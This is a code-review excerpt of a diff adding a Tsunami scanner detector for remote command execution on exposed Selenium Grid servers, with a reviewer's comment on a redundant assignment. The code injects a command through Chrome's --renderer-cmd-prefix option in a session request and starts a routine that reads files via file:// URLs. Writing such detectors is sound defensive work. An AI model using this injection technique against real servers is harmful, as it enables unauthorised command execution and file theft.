community/detectors/selenium_grid_rce_via_exposed_server/src/main/java/com/google/tsunami/plugins/detectors/rce/selenium/RCEViaExposedSeleniumGridDetector.java

```diff
@@ -0,0 +1,523 @@
+
+      try {
+        HttpResponse response =
+            httpClient.send(get(statusUri).withEmptyHeaders().build(), networkService);
+
+        if (response.status().isSuccess() || response.bodyJson().isPresent()) {
+          JsonObject jsonResponse = (JsonObject) response.bodyJson().get();
+          JsonObject value = (JsonObject) jsonResponse.get("value");
+          JsonPrimitive readyPrimitive = value.getAsJsonPrimitive("ready");
+          if (readyPrimitive != null) {
+            seleniumIsReady = readyPrimitive.getAsBoolean();
+            if (seleniumIsReady) {
+              return true;
+            }
+          }
+
+        } else {
+          logger.atInfo().log("Invalid Selenium Grid response.");
+          return false;
+        }
+
+      } catch (JsonSyntaxException | IOException | AssertionError e) {
+        logger.atWarning().withCause(e).log("Request to target %s failed", statusUri);
+        return false;
+      }
+
+      // Sleep
+      try {
+        Thread.sleep(POLLING_RATE);
+
+      } catch (InterruptedException e) {
+        logger.atWarning().log("Failed to wait for Selenium ready state");
+        return false;
+      }
+    }
+  }
+
+  // Injects RCE command with --renderer-cmd-prefix Chrome browser parameter.
+  // This prevents a normal chrome instance startup which should result in a "tab crashed" error.
+  // Returns true if the injected command caused a tab crash (command likely executed).
+  private boolean executeCommandViaChrome(NetworkService networkService, String command) {
+    String targetUri = buildTargetUrl(networkService, SELENIUM_GRID_SERVICE_PATH + "/session");
+    String reqPayload = String.format(payloadFormatString, command);
+    boolean hasTabCrashed;
+
+    logger.atInfo().log("Executing command via Selenium: " + command);
+    HttpRequest req =
+        HttpRequest.post(targetUri)
+            .setHeaders(HttpHeaders.builder().addHeader(CONTENT_TYPE, "application/json").build())
+            .setRequestBody(ByteString.copyFromUtf8(reqPayload))
+            .build();
+    try {
+      HttpResponse response = httpClient.send(req, networkService);
+      hasTabCrashed =
+          (response.bodyString().map(body -> body.contains("tab crashed")).orElse(false));
+
+    } catch (IOException e) {
+      logger.atWarning().withCause(e).log("Request to target %s failed", targetUri);
+      return false;
+    }
+
+    // Injected command in --renderer-cmd-prefix will prevent Chrome from starting up properly
+    if (hasTabCrashed) {
+      logger.atInfo().log("Chrome tab crashed, command likely executed.");
+      return true;
+
+    } else {
+      return false;
+    }
+  }
+
+  // Reads a file with file:// browser protocol.
+  // Returns the contents of the file read, or null if not successful / not found.
+  private String readFileViaSelenium(NetworkService networkService, String filePath) {
+    String targetUri = buildTargetUrl(networkService, SELENIUM_GRID_SERVICE_PATH + "/session");
```

Comment:
I wouldd delete this assignment since it's redefined on line 369 with a different value